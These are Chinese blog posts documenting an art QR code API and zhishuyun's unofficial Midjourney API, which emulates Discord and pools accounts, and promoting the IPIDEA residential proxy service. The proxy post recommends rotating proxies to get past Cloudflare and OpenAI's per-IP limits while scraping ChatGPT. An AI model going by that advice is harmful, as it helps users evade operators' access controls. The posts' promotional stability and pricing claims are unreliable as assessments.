qrw：二维码的权重。当权重越大，图片越接近真实二维码，但是艺术化的风格会减弱，取值范围是 1.5-3，默认是 1.5。
seed：随机种子。用于生成随机二维码，当种子相同时，生成的二维码风格是一样的，范围为 1-9007199254740991。
rawurl：是否保持原始链接。默认情况下会将输入链接缩短为短链接，可以提高扫码率，该值默认为 false。
padding_level：二维码内边距。二维码内边距的大小，
aspect_ratio：二维码宽高比。
position：二维码位置。
pixel_style：二维码像素风格。
marker_shape：二维码定位框形状。
sub_marker：二维码子标记样式。
rotate：二维码旋转角度。
ecl：二维码纠错等级。
padding_noise：二维码内边距噪点。

下文我们来详细了解下艺术二维码 API 的一些高级参数，选取其中一些进行介绍。

注意：API 可能在不断迭代，下文内容仅供参考，最新 API 使用方式请参见知数云官方文档：https://data.zhishuyun.com/documents/821cfbbf-6b97-4c42-b21f-e29fdd245a96

预设 preset

艺术二维码 API 设置了很多预设模板，这个参数叫做 preset，取值如下：

sunset（日落）: 融合了夕阳余晖的温暖色调和柔和光线效果。
floral（花卉）: 带有花朵和植物元素的艺术风格，强调自然之美。
snowflakes（雪花）: 冰雪世界，具有冰晶和雪花的冷酷氛围。
feathers（羽毛）: 呈现出羽毛和鸟类特征，营造轻盈和柔软的感觉。
raindrops（雨滴）: 以雨滴和水珠为灵感，创造出清新湿润的效果。
ultra-realism（超现实）: 极度逼真的细节和质感，营造出超越现实的效果。
epic-realms（史诗领域）: 壮丽的场景和史诗感，带来宏大的视觉体验。
intricate-studio（错综复杂）: 富有细节和复杂性，需要仔细观察才能完全理解的风格。
symmetric-masterpiece（对称杰作）: 通过对称元素创造出精美的平衡和谐。
luminous-highway（发光高速公路）: 强调夜间的发光效果，如车灯和霓虹灯。
celestial-journey（星际之旅）: 探索宇宙和星际的奇幻旅程。
neon-mech（霓虹机械）: 结合了霓虹灯和机械元素，营造出未来感。
ethereal-low-poly（飘渺低多边形）: 低多边形风格，创造出虚幻和抽象的效果。
golden-vista（金色景观）: 以金色调为主，呈现出壮观的视觉景象。
cinematic-expanse（电影式广袤）: 带有电影感的广阔场景，引人入胜。
cinematic-warm（电影式温暖）: 具有电影质感的温暖色调和光线效果。
desolate-wilderness（荒凉荒野）: 描绘荒芜和荒野，营造出孤寂感。
vibrant-palette（鲜明调色板）: 色彩丰富多样，强烈的色彩对比。
enigmatic-journey（神秘之旅）: 探索充满谜团和神秘感的旅程。
timeless-cinematic（永恒电影）: 具有电影质感且不受时间限制的风格。
regal-galaxy（皇家星系）: 带有皇家气息的星系和宇宙元素。
illustrious-canvas（杰出画布）: 创作出卓越而引人注目的画布效果。
expressive-mural（富有表现力的壁画）: 充满表现力和情感的大型壁画风格。
serene-haze（宁静薄雾）: 带有宁静和薄雾效果，营造出宁静的氛围。

我们下面来尝试下不同参数的效果，比如拿 raindrops（雨滴）和 raindrops（金色景观）为例来看下效果。

curl -X POST "https://api.zhishuyun.com/qrart/generate?token={token}" \
  -H "accept: application/json" \
  -H "content-type: application/json" \
  -d '{
    "type": "link",
    "content": "https://data.zhishuyun.com",
    "prompt": "sakura",
    "preset": "sunset"
  }'

这里我们把 preset 设置为了日落效果，效果如下：

如果我们换个风格，比如把 preset 参数换成 expressive-mural（富有表现力的壁画），效果如下：

关于其他的一些设定大家可以自行试验。

二维码宽高比 aspect_ratio

通过 aspect_ratio 参数我们可以设置二维码的宽高比，比如正方形 1:1，长方形 16:9 等等，该参数：

1:1：宽高比为 1:1，表示画布的宽度和高度相等。对应的像素尺寸为 768x768，生成的二维码画布为正方形。
16:9：宽高比为 16:9，表示画布的宽度是高度的 16/9 倍。对应的像素尺寸为 1008x576，生成的二维码画布宽度较大，适合宽屏显示。
9:16：宽高比为 9:16，表示画布的宽度是高度的 9/16 倍。对应的像素尺寸为 576x1008，生成的二维码画布高度较大，适合竖屏显示。
4:3：宽高比为 4:3，表示画布的宽度是高度的 4/3 倍。对应的像素尺寸为 864x672，生成的二维码画布略带正方形感，适合一般显示。
3:4：宽高比为 3:4，表示画布的宽度是高度的 3/4 倍。对应的像素尺寸为 672x864，生成的二维码画布略带纵向矩形感，适合一般显示。

curl -X POST "https://api.zhishuyun.com/qrart/generate?token={token}" \
  -H "accept: application/json" \
  -H "content-type: application/json" \
  -d '{
    "type": "link",
    "content": "https://data.zhishuyun.com",
    "prompt": "Plate of Nigiri sushi",
    "aspect_ratio": "1:1"
  }'

这里我们尝试生成了一个正方形的二维码，效果如下：

二维码位置 position

我们还可以通过 position 参数控制二维码的位置，比如说一张图片里面有一个女生穿裙子，而我们想要把二维码放在裙子的位置并与之融合起来，我们就可以尝试改下二维码的位置，调用样例如下：

curl -X POST "https://api.zhishuyun.com/qrart/generate?token={token}" \
  -H "accept: application/json" \
  -H "content-type: application/json" \
  -d '{
    "type": "link",
    "content": "https://data.zhishuyun.com",
    "prompt": "one of the beautiful girls in the moonlight in the background, in the style of pixelated chaos, rococo-inspired art, dark white and sky-blue, made of plastic, delicate flowers, gongbi, wimmelbilder",
    "position": "bottom"
  }'

效果如下：

二维码像素风格 pixel_style

我们还可以自定义二维码的像素风格，通过传入 pixel_style 即可，参数可选值如下：

square（方形）：使用方形的像素单元，每个像素单元都是正方形的形状。
rounded（圆角）：像素单元具有圆角，使得生成的二维码看起来更加柔和和现代化。
dot（点状）：使用小圆点作为像素单元，生成的二维码呈现出点阵的效果，类似于印刷效果。
squircle（圆角方形）：类似于圆角矩形，但更加接近圆形的形状，为生成的二维码赋予一种独特的风格。
row（行排列）：将像素单元按行排列，呈现出水平方向的图案。
column（列排列）：将像素单元按列排列，呈现出垂直方向的图案。

二维码框风格 marker_shape

通过 marker_shape 可以自定义定位框的风格，参数可选值如下：

square（方形）：标记形状为正方形，用于突出特定位置或元素。
circle（圆形）：标记形状为圆形，可用于标记关键区域或元素。
plus（加号）：标记形状为加号，类似十字型，用于突出注意或特定信息。
box（方框）：标记形状为方框，类似于描边的矩形，可用于围绕区域或元素。
octagon（八边形）：标记形状为八边形，带有独特的角落，用于视觉吸引。
random（随机）：标记形状随机分布，为二维码添加艺术感和视觉趣味。
tiny-plus（微小加号）：微小的加号标记，可用于标记细微的元素或细节。

二维码子标记风格 sub_marker

通过 sub_marker 可以用于子标记（较小的标记）的形状，参数可选值如下：

square（方形）：子标记的形状为正方形，可以用于突出特定位置的细节。
circle（圆形）：子标记的形状为圆形，可用于强调关键细节或元素。
box（方框）：子标记的形状为方框，类似于描边的矩形，适用于标记细小区域。
random（随机）：子标记的形状随机分布，为二维码添加艺术感和视觉趣味。
plus（加号）：子标记的形状为加号，类似十字型，可以用于标记细微的信息或元素。

二维码旋转角度 rotate

通过 rotate 可以控制二维码的旋转角度，参数可选值如下：

0：不进行旋转，生成的二维码保持原始方向，没有旋转效果。
90：将生成的二维码顺时针旋转 90 度，使其以纵向方向显示。
180：将生成的二维码旋转 180 度，使其倒置，即上下颠倒的显示方式。
270：将生成的二维码顺时针旋转 270 度，使其以逆纵向方向显示。

在这里我们就不再对各种 API 参数进行一一介绍了，更详细更实时的内容可以参见知数云的官方文档，链接为：https://data.zhishuyun.com/documents/ee085d2a-a0b9-4f0e-8b4d-8da407345138。

价格

知数云艺术二维码的 API 提供了阶梯定价，首次申请免费赠送 20 次，而且购买越多越便宜，由于价格会动态调整，所以大家可以查看知数云官网来查看最新实时价格：https://data.zhishuyun.com/services/38ecf158-36f2-42f2-8e7f-6786cdfc2452

以上便是知数云艺术二维码的一些介绍，希望对大家有帮助，谢谢！

非常感谢你的阅读，更多精彩内容，请关注我的公众号「进击的 Coder」和「崔庆才丨静觅」。

作者崔庆才发表于 2023-09-01 阅读次数：本文字数： 7.1k 阅读时长 ≈ 6 分钟

技术杂谈 Midjourney API 的申请和使用

Midjourney API 申请及使用

在人工智能绘图领域，想必大家听说过 Midjourney 的大名吧！

Midjourney 以其出色的绘图能力在业界独树一帜。无需过多复杂的操作，只要简单输入绘图指令，这个神奇的工具就能在瞬间为我们呈现出对应的图像。无论是任何物体还是任何风格，都能在 Midjourney 的绘画魔法下得以轻松呈现。如今，Midjourney 早已在各个行业和领域广泛应用，其影响力愈发显著。

然而，在国内想要使用 Midjourney 却面临着相当大的挑战。首先，Midjourney 目前驻扎在 Discord 平台中，这意味着要使用 Midjourney，必须通过特殊的充值途径获得访问权限。如果没有订阅，几乎无法使用 Midjourney，因此单是使用这一工具就成了一个巨大的难题。此外，有人或许会疑问：Midjourney 是否提供对外 API 服务？然而事实是，Midjourney 并未向外界提供任何 API 服务，而且从目前情况看来，这一情况似乎也不会改变。

那么，是否有方法能够与 Midjourney 对接，并将其融入到自己的产品中呢？

答案是肯定的。接下来，我将为大家介绍知数云平台所提供的 Midjourney API，通过使用该 API，我们能够实现与 Midjourney 官方完全一致的效果和操作，下文会详细介绍。

简介

知数云平台是什么呢？简单来说，它是一个提供多样数字化 API 的服务平台，其官网链接是：https://data.zhishuyun.com。

你可能会疑惑，既然 Midjourney 官方并未向外提供 API，那么知数云平台的 API 是如何诞生的呢？简言之，知数云的 Midjourney 与 Discord 内的 Midjourney Bot 进行了接口对接，同时模拟了底层通信协议，从而能够在 Discord 平台上实现与 Midjourney 官方完全相同的操作。这涵盖了文字生成图片、图像转换、图像融合、图文生成等多个功能。此外，该 API 在后台维护了大量 Midjourney 账号，通过负载均衡控制实现了高度的并发处理，比官方 Midjourney 单一账号的并发能力要更高。

总体来看，无论是在 Discord 上使用 Midjourney 提供的哪一项功能，这个 API 都能完全还原官方操作的效果和效能。

稳定性如何呢？根据我个人几个月的观察和使用经验，可以毫不夸张地说，目前业界很难找到比知数云 Midjourney API 更稳定且并发处理能力更高的选择，而且还能保持 Midjourney 这一价格水平。这样的选择寥寥无几。

下面我们就来了解下这个 API 的申请和使用方法吧。

申请流程

下文内容大多数来源于知数云 Midjourney API 官方介绍文档，文档链接：https://data.zhishuyun.com/documents/0fd3dd40-a16a-4246-8313-748b8e75c29e，最新内容以官方文档为准。

要使用 Midjourney Imagine API，首先可以到 Midjourney Imagine API 页面点击「获取」按钮：

如果你尚未登录，会自动跳转到登录页面。扫码关注公众号即可自动登录，无需额外注册步骤。

登录完了之后会跳回原页面 Midjourney Imagine API ，此时会提示「您尚未申请该服务，需要申请」。

申请时会校验实名认证情况，请按照网站提示完成实名认证。实名认证会校验姓名、手机号、身份证号，需要三者一致才可以通过认证。认证完了之后可以返回页面，刷新一下页面确保信息更新，然后重新申请即可通过申请。

基本使用

接下来就可以在界面上填写对应的内容，如图所示：

在第一次使用该接口时，我们至少需要填写两个参数，一个是 action，另一个是 prompt。其中 action 参数代表了生成图的操作类型，由于第一次调用该 API 我们没有生成过任何内容，所以我们需要先输入文字来生成一副预览图，所以这时候 action 应该填写为 generate。另外一个参数 prompt 就是我们想生成的图片描述内容了，强烈建议用英文描述，画的图会更准确效果更好，这里我们填写了 beautiful dress，代表要画一条好看的裙子。

依次填写好图中所示参数，然后点击「测试」按钮即可测试接口。「测试」按钮下方会显示 API 返回的结果。同时您可以注意到右侧有对应的调用代码生成，您可以复制代码到您的 IDE 里面进行对接和开发。

调用之后，我们发现返回结果如下：

{
  "image_url": "https://midjourney.cdn.zhishuyun.com/attachments/1124768570157564029/1142862320582791268/nglover_beautiful_dress_id4899456_02d66331-b4d5-46bd-b5ea-efa6d9447528.png",
  "image_id": "1142862320582791268",
  "progress": 100,
  "actions": [
    "upsample1",
    "upsample2",
    "upsample3",
    "upsample4",
    "reroll",
    "variation1",
    "variation2",
    "variation3",
    "variation4"
  ],
  "task_id": "cf735d83-6e02-4e0a-a265-3e8ed46b8070"
}

返回结果一共有如下字段：

task_id，生成此图像任务的 ID，用于唯一标识此次图像生成任务。

image_id，图片的唯一标识，在下次需要对图片进行变换操作时需要传此参数。

image_url，图片的 URL，直接打开即可查看生成的效果，如图所示：

可以看到，这里生成了一张 2x2 的预览图。

actions，可以对生成的图片进行的进一步操作列表。这里一共列了 9 个，其中 upsample 代表放大，variation 代表变换，reroll 代表重新生成。所以 upsample1 代表的就是对左上角第一张图片进行放大操作，variation3 就是代表根据左下角第三张图片进行变换操作。

到现在为止，第一次 API 调用就完成了。

提示：如果您觉得上述生图速度较慢，想进一步提升用户体验，可以考虑采用流式传输的模式或者使用极速 API，具体可参考文档下方内容。

图像放大与变换

下面我们尝试针对当前生成的照片进行进一步的操作，比如我们觉得右上角第二张的图片还不错，但我们想进行一些变换微调，那么就可以进一步将 action 填写为 variation2，同时将 image_id 传递即可，prompt 可以留空：

这时候得到的结果如下：

{
  "image_url": "https://midjourney.cdn.zhishuyun.com/attachments/1124768570157564029/1142864001001345245/handerson6243_beautiful_dress_id4899456_aab4a0bf-7d99-4b7f-818c-c4dc690300ea.png",
  "image_id": "1142864001001345245",
  "progress": 100,
  "actions": [
    "upsample1",
    "upsample2",
    "upsample3",
    "upsample4",
    "reroll",
    "variation1",
    "variation2",
    "variation3",
    "variation4"
  ],
  "task_id": "b6f464b6-0cac-43e7-ae4e-12658679b7f3"
}

打开 image_url，新生成的图片如下所示：

可以看到，针对上一张右上角的图片，我们再次得到了四张类似的照片。

这时候我们可以挑选其中一张进行精细化地放大操作，比如选第四张，那就可以 action 传入 upsample4，通过 image_id 再次传入当前图像的 ID 即可。

注意： upsample 操作相比 variation 来说，Midjourney 的耗时会更短一些。

返回结果如下：

{
  "image_url": "https://midjourney.cdn.zhishuyun.com/attachments/1124768570157564029/1142864651860840458/ruthgarcia3808_beautiful_dress_id4899456_096f6a64-7412-4cb5-8f50-4afbfc456d55.png",
  "image_id": "1142864651860840458",
  "progress": 100,
  "actions": [
    "high_variation",
    "low_variation",
    "zoom_out_2x",
    "zoom_out_1_5x",
    "pan_left",
    "pan_right",
    "pan_up",
    "pan_down"
  ],
  "task_id": "9f5c34e3-c8af-415c-9377-fb46cd47ad45"
}

其中 image_url 如图所示：

这样我们就成功得到了一张独立的连衣裙的照片。

同时注意到 actions 里面又包含了几个可进行的操作，介绍如下：

high_variation：对画面进行高变换（具体含义请参考 Midjourney 官方）。

low_variation：对画面进行低变换（具体含义请参考 Midjourney 官方）。

zoom_out_2x：对画面进行缩小两倍操作（周围区域填充）。

zoom_out_1_5x：对画面进行缩小 1.5 倍操作（周围区域填充）。

pan_left：对画面进行左移和填充操作。

pan_right：对画面进行右移和填充操作。

pan_top：对画面进行上移和填充操作。

pan_bottom：对画面进行下移和填充操作。

可以继续按照上述流程传入对应的变换指令进行连续生图操作，可以实现无限次连续操作，这里不再一一赘述。

图像改写（垫图）

该 API 也支持图像改写，俗称垫图，我们可以输入一张图片 URL 以及需要改写的描述文字，该 API 就可以返回改写后的图片。

注意：输入的图片 URL 需要是一张纯图片，不能是一个网页里面展示一张图片，否则无法进行图像改写。建议使用图床（如阿里云 OSS、腾讯云 COS、七牛云、又拍云等）来上传获取图片的 URL。

假设这里我们有一张图片，URL 是 https://cdn.zhishuyun.com/20230504-222359.png，是一张小女孩写字的图片：

现在我们想把它转化为卡通风格，可以直接在 prompt 字段将 URL 和要调整的文字一并输入即可，二者用空格分隔，比如：

1	https://cdn.zhishuyun.com/20230504-222359.png transfer to cartoon style

样例调用如下：

输出结果如下：

{
  "task_id": "9297d5ab-4014-44d4-91c8-a6d8927a0756",
  "image_id": "1103689414850387968",
  "image_url": "https://midjourney.cdn.zhishuyun.com/attachments/1100813695770165341/1103689414850387968/Azyern_Zieca_ignore9297d5ab-4014-44d4-91c8-a6d8927a0756_ec5cda5c-8784-4707-be17-a168786e0c8a.png",
  "actions": [
    "upsample1",
    "upsample2",
    "upsample3",
    "upsample4",
    "variation1",
    "variation2",
    "variation3",
    "variation4"
  ]
}

这时候，我们可以看到就得到了类似的卡通风格的图片了：

异步回调

由于 Midjourney 生成图片需要等待一段时间，所以本 API 也相应设计为了长等待模式。但在部分场景下，长等待可能会带来一些额外的资源开销，因此本 API 也提供了异步 Webhook 回调的方式，当图片生成成功或失败时，其结果都会通过 HTTP 请求的方式发送到指定的 Webhook 回调 URL。回调 URL 接收到结果之后可以进行进一步的处理。

下面演示具体的调用流程。

首先，Webhook 回调是一个可以接收 HTTP 请求的服务，开发者应该替换为自己搭建的 HTTP 服务器的 URL。此处为了方便演示，使用一个公开的 Webhook 样例网站 https://webhook.site/，打开该网站即可得到一个 Webhook URL，如图所示：

将此 URL 复制下来，就可以作为 Webhook 来使用，此处的样例为 https://webhook.site/c62713a6-0487-45bd-9ad2-08a91d7ed12d。

接下来，我们可以设置字段 callback_url 为上述 Webhook URL，同时填入 prompt，如图所示：

点击测试之后会立即得到一个 task_id 的响应，用于标识当前生成任务的 ID，如图所示：

稍等片刻，等图片生成结束，可以发发现 Webhook URL 收到了一个 HTTP 请求，如图所示：

其结果就是当前任务的结果，内容如下：

{
  "success": true,
  "task_id": "8aad0fe0-2300-4702-94dc-39a5d3e2f2f3",
  "actions": [
    "upsample1",
    "upsample2",
    "upsample3",
    "upsample4",
    "variation1",
    "variation2",
    "variation3",
    "variation4"
  ],
  "image_id": "1103693480024363198",
  "image_url": "https://midjourney.cdn.zhishuyun.com/attachments/1100813695770165341/1103693480024363198/Azyern_Zieca_ignore8aad0fe0-2300-4702-94dc-39a5d3e2f2f3_a_beaut_b3d5720a-b917-4a2d-b6e7-ae641ee7ca4f.png"
}

其中 success 字段标识了该任务是否执行成功，如果执行成功，还会有同样的 actions, image_id, image_url 字段，和上文介绍的返回结果是一样的，另外还有 task_id 用于标识任务，以实现 Webhook 结果和最初 API 请求的关联。

如果图片生成失败，Webhook URL 则会收到类似如下内容：

{
  "success": false,
  "task_id": "7ba0feaf-d20b-4c22-a35a-31ec30fc7715",
  "code": "bad_request",
  "detail": "Unrecognized argument(s): `-c`, `x`"
}

这里的 success 字段会是 false，同时还会有 code 和 detail 字段描述了任务错误的详情信息，Webhook 服务器根据对应的结果进行处理即可。

流式输出

Midjourney 官方在生成图片的时候是有进度的，在最开始是一张模糊的照片，然后经过几次迭代之后，图片逐渐变得清晰，最后得到完整的图片。

所以，一张图片的生成过程大约可以分为「发送命令」->「开始生图（多次迭代逐渐清晰）」->「生图完毕」的阶段。

在没开启流式输出的情况下，本 API 从发起请求到返回结果，实际上是从上述「发送命令」->「生图完毕」的全过程，中间生图的过程也全被包含在里面，由于 Midjourney 本身生成图片速度较慢，整个过程大约需要等待一分钟或更久。

所以为了更好的用户体验，本 API 支持流式输出，即当「开始生图」的时候就开始返回结果，每当绘制进度有变化，就会流式将结果输出，直至生图结束。

如果想流式返回响应，可以更改请求头里面的 accept 参数，修改为 application/x-ndjson，不过调用代码需要有对应的更改才能支持流式响应。

Python 样例代码：

import requests

url = 'https://api.zhishuyun.com/midjourney/imagine?token={token}'
headers = {
    'content-type': 'application/json',
    'accept': 'application/x-ndjson'
}
body = {
    "prompt": "a beautiful cat",
    "action": "generate"
}
r = requests.post(url, headers=headers, json=body, stream=True)
for line in r.iter_lines():
    print(line.decode())

运行结果：

{"image_id":"1112780200447578272","image_url":"https://midjourney.cdn.zhishuyun.com/attachments/1111955518269948007/1112780200447578272/grid_0.webp","actions":[],"progress":0}
{"image_id":"1112780227496640635","image_url":"https://midjourney.cdn.zhishuyun.com/attachments/1111955518269948007/1112780227496640635/grid_0.webp","actions":[],"progress":15}
{"image_id":"1112780238934523994","image_url":"https://midjourney.cdn.zhishuyun.com/attachments/1111955518269948007/1112780238934523994/grid_0.webp","actions":[],"progress":31}
{"image_id":"1112780254398918716","image_url":"https://midjourney.cdn.zhishuyun.com/attachments/1111955518269948007/1112780254398918716/grid_0.webp","actions":[],"progress":46}
{"image_id":"1112780265933262858","image_url":"https://midjourney.cdn.zhishuyun.com/attachments/1111955518269948007/1112780265933262858/grid_0.webp","actions":[],"progress":62}
{"image_id":"1112780280965648394","image_url":"https://midjourney.cdn.zhishuyun.com/attachments/1111955518269948007/1112780280965648394/grid_0.webp","actions":[],"progress":78}
{"image_id":"1112780292621598860","image_url":"https://midjourney.cdn.zhishuyun.com/attachments/1111955518269948007/1112780292621598860/grid_0.webp","actions":[],"progress":93}
{"image_id":"1112780319758766080","image_url":"https://midjourney.cdn.zhishuyun.com/attachments/1111955518269948007/1112780319758766080/dawn97_ignore81c5c24e-ea94-4ae2-aee4-252a98a347ed_a_beautiful_c_e20c3bc8-8827-4c99-9cf5-7d56c2e9d47f.png","actions":["upsample1","upsample2","upsample3","upsample4","variation1","variation2","variation3","variation4"],"progress":100}

可以看到，启用流式输出之后，返回结果就是逐行的 JSON 了。在这里我们用 Python 里面的 iter_lines 方法自动获取了下一行的内容并打印出来。

如果要手动进行处理逐行 JSON 结果的话可以使用 \r\n 来进行分割。

例如在浏览器环境中，用 JavaScript 的 axios 库来实现手动处理，代码可改写如下：

axios({
  url: "https://api.zhishuyun.com/midjourney/imagine?token={token}",
  data: {
    prompt: "a beautiful cat",
    action: "generate",
  },
  headers: {
    accept: "application/x-ndjson",
    "content-type": "application/json",
  },
  responseType: "stream",
  method: "POST",
  onDownloadProgress: (progressEvent) => {
    const response = progressEvent.target.response;
    const lines = response.split("\r\n").filter((line) => !!line);
    const lastLine = lines[lines.length - 1];
    console.log(lastLine);
  },
}).then(({ data }) => Promise.resolve(data));

但注意在 Node.js 环境中，实现稍有不同，代码可写为如下：

const axios = require("axios");

const url = "https://api.zhishuyun.com/midjourney/imagine?token={token}";
const headers = {
  "Content-Type": "application/json",
  Accept: "application/x-ndjson",
};
const body = {
  prompt: "a beautiful cat",
  action: "generate",
};

axios
  .post(url, body, { headers: headers, responseType: "stream" })
  .then((response) => {
    console.log(response.status);
    response.data.on("data", (chunk) => {
      console.log(chunk.toString());
    });
  })
  .catch((error) => {
    console.error(error);
  });

Java 样例代码：

import okhttp3.*;

import java.io.BufferedReader;
import java.io.IOException;
import java.io.InputStreamReader;

public class Main {
    public static void main(String[] args) {
        String url = "https://api.zhishuyun.com/midjourney/imagine?token={token}";

        OkHttpClient client = new OkHttpClient();

        MediaType mediaType = MediaType.parse("application/json");
        RequestBody body = RequestBody.create(mediaType, "{\"prompt\": \"a beautiful cat\"}");
        Request request = new Request.Builder()
                .url(url)
                .post(body)
                .addHeader("Content-Type", "application/json")
                .addHeader("Accept", "application/x-ndjson")
                .build();

        client.newCall(request).enqueue(new Callback() {
            @Override
            public void onFailure(Call call, IOException e) {
                e.printStackTrace();
            }

            @Override
            public void onResponse(Call call, Response response) throws IOException {
                if (!response.isSuccessful()) throw new IOException("Unexpected code " + response);

                try (BufferedReader br = new BufferedReader(
                        new InputStreamReader(response.body().byteStream(), "UTF-8"))) {
                    String responseLine;
                    while ((responseLine = br.readLine()) != null) {
                        System.out.println(responseLine);
                    }
                }
            }
        });
    }
}

运行结果都是类似的。

另外注意到，流式输出的结果多了一个字段叫做 progress，这个代表绘制进度，范围是 0-100，如果需要，您也可以在页面展示这个信息。

注意：当绘制未完全完成的时候，actions 字段是空，即无法对中间过程的图片做进一步的处理操作。绘制完毕之后，绘制过程中产生的 image_url 会被销毁。另外异步回调可以和流式输出一起使用。

好了，通过以上内容介绍，我们就了解了知数云 Midjourney API 的使用方法，有了这个 API，我们可以包装自己的产品，实现和官方 Midjourney 一模一样的对接。

套餐介绍

到了最后，大家可能好奇，这个价格套餐式怎样的情况呢？

知数云对上文介绍的 API 提供了三种套餐，分别是快速、慢速、极速模式，介绍如下：

快速：背后的 Midjourney 账号均是 Fast 模式，能够以快速模式出图，正常情况下绘制完整图片时间在 1 分钟左右，开启流式模式会更快。
慢速：背后的 Midjourney 账号均是 Relax 模式，生成速度无任何保证，快的话可能 1 分钟，慢的话可能甚至 10 分钟，适合对速度要求较低的用户。
极速：背后的 Midjourney 账号军事 Turbo 模式，生成速度比快速模式更快，正常情况下绘制完整图片时间在 30 秒左右，开启流式模式会更快。适合对速度要求极高的用户。

价格怎么样呢？由于价格可能会动态变化，大家可以直接参考知数云的官方网站了解：https://data.zhishuyun.com/services/d87e5e99-b797-4ade-9e73-b896896b0461。但总的来说，能够以这个价格做到知数云 Midjourney API 这样的稳定性和并发的，业界寥寥无几，欢迎选购和评测。

谢谢！

作者崔庆才发表于 2023-08-21 阅读次数：本文字数： 12k 阅读时长 ≈ 11 分钟

技术杂谈 分享一个稳定好用的国外代理

许多朋友问我有没有好用的海外代理。说实话，真的好用的并不多。

最近我了解到了一家还不错的海外代理，叫做 IPIDEA，我已经使用了一段时间了，觉得质量挺不错。

你可能知道，我最近在进行一些 ChatGPT 相关的研究，由于各种原因，我需要大量的海外代理才能够使用服务，这个代理实在是帮了我大忙。如果你有需要的话，可以参考下面我对这家代理的使用体验来选购。

介绍

首先，我介绍一下这家代理的一些特点。他们并不像国内的很多代理厂商一样提供的是一些国内代理。这家代理主要提供海外代理，因此他们的用户大部分是有海外代理使用需求的人。比如说，最近非常火爆的 ChatGPT，就对这类服务有很大的需求。

这家代理的官方网站是 http://www.ipidea.net/?utm-source=cqc&utm-keyword=?ipidea。从他们的介绍可以看到，他们是一家全球范围的 IP 代理服务商，能覆盖全球 220 个国家和地区，大部分代理实际上是住宅 IP。

官方介绍这家的代理 IP 数量大约是九千万左右，这个数量非常庞大，同时官方介绍说代理的可用率是 99.9%。

下面我们来看一下他们的一些套餐类型：

动态住宅代理：这种代理实际上就是用真实的住宅用户的 IP 搭建的代理。一般来说，住宅代理对于很多场景的使用封禁概率会比较低，因为很多厂商对封禁住宅代理是比较谨慎的。动态住宅代理其实就是可以定时切换的 IP，比如说做网络爬虫，我们就需要不断变换的不同的代理 IP，这样可以进一步的减少被封禁的概率。
静态住宅代理：相对于动态代理来说，静态住宅代理的特点就是长效稳定，可以一直获取一个稳定不变的代理 IP，适合长久的稳定的海外网络环境使用。比如说，我们要进行自动化网站的爬取，如果在一个页面内 IP 地址频繁变动会增大被风控的概率。所以，如果有一个长效稳定的住宅 IP 代理，就会非常方便。
数据中心代理：这种代理实际上是很多服务器厂商的服务器搭建起来的代理。例如腾讯云、阿里云、微软云等服务器所在的 IP 地址段，就属于所谓的数据中心的 IP 地址段。因此，用这些服务器搭建出来的代理就叫做数据中心代理。一般来说，这种数据中心代理相对于住宅代理更容易被爬虫封禁，但是这种代理的优势就是价格更加便宜，而且网络速度也会相对较好。

基本上，这家代理服务商涵盖了上述这三种类型，大家可以根据自己的需要来选择购买。

基本使用

首先，如果要使用代理的话，第一步自然是注册和登录，

这里值得一提的是，这家代理支持免费的测试，不需要一定充值才能用，就官网直接注册就可以获得一些免费额度：

注册和登录的详细流程我就不赘述了，注册登录完之后还需要进行实名认证才能开始使用代理。

下面，我会简单介绍一下这个代理服务的基本使用方法。你可以点击菜单上方的“获取代理”，然后会跳转到以下页面。

https://www.ipidea.net/getapi/

这里的代理使用方式分为两种，第一种是 API 提取的方式，第二种是隧道代理。下面我会先介绍第一种，即 API 提取的方式。

如图所示，我们切换到 API 提取方式的介绍页面，这里有三个子菜单：全球动态、独享数据中心、静态住宅。这三种类型我已在前面的介绍中涉及过，就不再详述。

以全球动态这一菜单为例，你可以看到页面下方显示了当前账户的余额和一些流量信息。再下方则是 API 提取的相关配置。

下面有许多配置选项，如提取数量、国家和地区、协议、数据格式、分隔符等，我们可以按需选择，然后点击按钮生成提取链接。

生成提取链接后，系统会自动提示是否加入白名单，因为这家代理商要求必须添加白名单才能使用代理。然后我们可以在右侧找到 API 提取的链接。

打开这个链接，我们就可以获取一部分代理的 IP 和端口信息。因为我们刚刚添加了白名单，所以当前这台主机可以直接提取。

后面的步骤我就不再赘述，我们可以直接使用爬虫将代理设置上，然后进行网站的爬取。

第二种就是隧道代理，简单来说，我们在设置代理时不需要知道具体的 IP 和端口。这个代理隧道可以帮助我们自动选择可用的代理，我们只需要设置一条固定的代理即可。

在下方有相应的教程，你可以看到这里有动态、长效 ISP 和动态数据中心这三种选项。

使用方法类似，我们可以在下方自由选择配置，然后进行代理隧道的设置。

在左侧选择完后，右侧会出现对应的命令行，我们可以直接复制这个命令完成代理的测试。

你可以看到这里，我们请求了一个测试网站，然后测试网站就可以将当前代理 IP 的相关信息打印出来。

这里值得注意的是，如果要使用这个代理，需要在海外环境中。在国内环境是无法使用的。

使用过程

接下来，我将简单分享一下我使用这些代理的过程。

近期，我在研究 ChatGPT 相关服务的搭建，因此在这个过程中，我确实有很多使用代理的需求。

动态数据中心/全球动态

我将动态数据中心和全球动态一起进行说明，因为它们的使用方式基本相同，二者的区别在于前者主要提供数据中心的代理 IP，而后者主要提供动态的住宅代理。因此，前者的价格相对较低，而后者的价格和质量则相对较高。

我使用这些代理的主要场景是搭建 ChatGPT 相关的 API，但这个 API 并非使用官方 OpenAI 的 key，而是用爬虫模拟网页的方式实现的。如果你感兴趣的话，可以了解一些开源项目，例如https://github.com/acheong08/ChatGPT，该项目的 V1 版本就是采用爬虫模拟网页形式实现 API 服务的。

那么，为什么我们需要代理呢？

实际上在这个服务背后，我们需要一个可以绕过 Cloudflare 网关的服务，而搭建这个网关就需要大量的动态代理，这样我们就可以突破单个 IP 地址请求 OpenAI 服务的限制。

如果你感兴趣，可以了解一些开源的实现，如https://github.com/acheong08/ChatGPT-Proxy-V4。

在这个服务背后，你会注意到有一个代理设置：

func main() {

  if http_proxy != "" {
    client.SetProxy(http_proxy)
    println("Proxy set:" + http_proxy)
  }

  PORT := os.Getenv("PORT")
  if PORT == "" {
    PORT = "9090"
  }
  handler := gin.Default()
  handler.GET("/ping", func(c *gin.Context) {
    c.JSON(200, gin.H{"message": "pong"})
  })

  handler.Any("/api/*path", proxy)

  gin.SetMode(gin.ReleaseMode)
  endless.ListenAndServe(os.Getenv("HOST")+":"+PORT, handler)
}

其中，http_proxy 参数可以设置为我们前面提到的隧道代理。例如：

1	export http_proxy="http://mAZFcgDR-zone-custom-region-us:<password>@na.ipidea.io:2336"

这样，我们就成功地将 IPIDEA 的隧道代理进行了设置。

